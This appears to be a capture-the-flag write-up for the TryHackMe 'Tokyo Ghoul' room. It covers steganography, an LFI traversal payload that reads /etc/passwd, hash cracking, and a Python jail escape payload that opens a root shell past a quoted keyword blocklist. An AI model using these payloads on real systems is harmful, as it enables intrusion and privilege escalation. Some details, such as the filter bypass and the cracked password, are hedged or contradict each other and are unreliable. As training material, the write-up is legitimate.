Based on your notes, this is the Tokyo Ghoul room on TryHackMe. It’s a fun, narrative-driven box that tests a wide variety of skills: Enumeration, Basic Reverse Engineering, Steganography, Web Exploitation (LFI), and Python Sandbox Escaping.
Here is the comprehensive writeup.
Tokyo Ghoul - Comprehensive Penetration Test Report
Target IP: 10.10.x.x (Tokyo Ghoul)
Difficulty: Medium
Objective: User (kamishiro) & Root (root.txt) Flags
Date: 2026-01-20
1. Executive Summary
“Tokyo Ghoul” is a Linux machine that requires a multi-disciplined approach. Initial reconnaissance reveals a hidden narrative in the HTML source code pointing to FTP. Analyzing files on the FTP server involves basic binary Reverse Engineering to recover a passphrase for Steganography. The hidden data reveals a secret web directory vulnerable to Local File Inclusion (LFI), allowing for the extraction of password hashes. Privilege escalation requires escaping a restricted Python Jail (PyJail) by bypassing input filters using introspection techniques.
Key TTPs (MITRE ATT&CK):
- T1027 (Obfuscated Files or Information): Steganography and Binary analysis.
- T1190 (Exploit Public-Facing App): Local File Inclusion (LFI).
- T1110 (Brute Force): Cracking SHA-512 hashes (
/etc/passwdleak). - T1059.006 (Python): Python Sandbox Escape (PyJail).
2. Enumeration & Forensics
A. Web & FTP Recon
- HTML Comment: The main page contained a comment hinting at FTP, clothes, and a mask.
- FTP Access: Anonymous login was enabled.
- Files:
Aogiri_tree.txt,need_to_talk(executable), andimportant.jpg(implied stego container).
B. Reverse Engineering (need_to_talk)
The binary prompts for a passphrase. Instead of running it blindly, we analyze it.
- Static Analysis: Using
stringsorrabin2 -z(from radare2) reveals interesting strings.
rabin2 -z need_to_talk- Findings: The string
kamishiroandYou_found_1tappear in the data section. - Execution: Providing
kamishiroas input confirmsYou_found_1tis the passphrase.
C. Steganography & Decoding
We use the passphrase You_found_1t to extract hidden data from the image found on FTP (or a file derived from the binary interaction).
steghide extract -sf important.jpg
# Passphrase: You_found_1t- Result:
yougotme.txtcontaining Morse Code. - Decoding: The Morse code translates to a directory path:
/d1r3c70ry_center.
3. Initial Access: The LFI
A. The “Scan Me” Page
Navigating to http://10.10.x.x/d1r3c70ry_center/ presents a scanning interface. The URL structure /claim/index.php?view=flower.gif strongly suggests Local File Inclusion.
B. Exploitation
The server filters standard LFI payloads (“no no no silly”). However, LFI filters are often weak against directory traversal. Payload:
curl "http://10.10.x.x/d1r3c70ry_center/claim/index.php?view=../../../../etc/passwd"Result: The contents of /etc/passwd are dumped, including the hash for user kamishiro.
C. Cracking the Hash
The hash is SHA-512 (starts with $6$).
kamishiro:$6$Tb/euwmK$OXA...:1001:1001:,,,:/home/kamishiro:/bin/bash- Tool: John the Ripper or Hashcat.
- Command:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt - Password:
password123
D. SSH Access
ssh kamishiro@10.10.x.x
# Password: password1234. Privilege Escalation: Python Jail Escape
A. The Jail
Upon logging in (or running a sudo command), you are trapped in a Python script (jail.py).
Code Analysis:
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print("Do you think i will let you do this ??????")- Constraint: You cannot use standard keywords to spawn a shell.
- Goal: Execute
os.system('/bin/bash').
B. The Escape
To bypass the blacklist filter, we can reconstruct the string names of the modules we need (like ‘os’ and ‘system’) using string manipulation, or use Python’s introspection features (__builtins__).
The Logic:
'__IMPORT__'.lower()becomes'__import__'.'OS'.lower()becomes'os'.- We pass these generated strings to
__builtins__.__dict__to call the functions without typing the forbidden keywords literally in the input.
Payload:
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')Breakdown:
__builtins__: Access to built-in functions.['__IMPORT__'.lower()]: Calls__import__(to import modules).('OS'.lower()): Imports theosmodule.['SYSTEM'.lower()]: Calls thesystemfunction from theosmodule.('/bin/bash'): The argument for system (spawn shell).
Result: Root Shell.
5. Remediation (Blue Team)
- Input Validation: Implement strict allow-listing for the
viewparameter in PHP to prevent LFI. Ensure inputs map to specific, expected files only. - Sensitive Data Exposure: Do not store hashes in
/etc/passwd(though modern Linux uses/etc/shadow, this box simulated a misconfiguration or an older system where the user had read access to the hash). - Python Security:
- “Jailing” a user via a Python script is rarely secure. Python’s dynamic nature makes it extremely difficult to restrict completely.
- If a restricted shell is needed, use
rbashorrkshwith strictly controlled paths, not a custom Python wrapper.
6. Resources & References
Since you asked for more resources, here is a curated list relevant to the techniques used in this box:
Python Jail Escapes (PyJail)
- Book.HackTricks (PyJail): The bible for these escapes. https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html
- PayloadAllTheThings (Python Jail): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Methodology%20and%20Resources/Python%20-%20Jail%20Escape
- CTF Wiki (Python Sandbox): https://ctf-wiki.org/pwn/linux/sandbox/python-sandbox/
Local File Inclusion (LFI)
- PayloadAllTheThings (LFI): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
- HackTricks (LFI): https://book.hacktricks.wiki/en/pentesting-web/file-inclusion/index.html
Reverse Engineering & Stego
- CyberChef (The Swiss Army Knife): Great for decoding Morse, Base64, etc. https://gchq.github.io/CyberChef/
- Radare2 (rabin2) Cheatsheet: https://github.com/radare/radare2/blob/master/doc/intro.md
- Steghide Manual: https://manpages.ubuntu.com/manpages/trusty/man1/steghide.1.html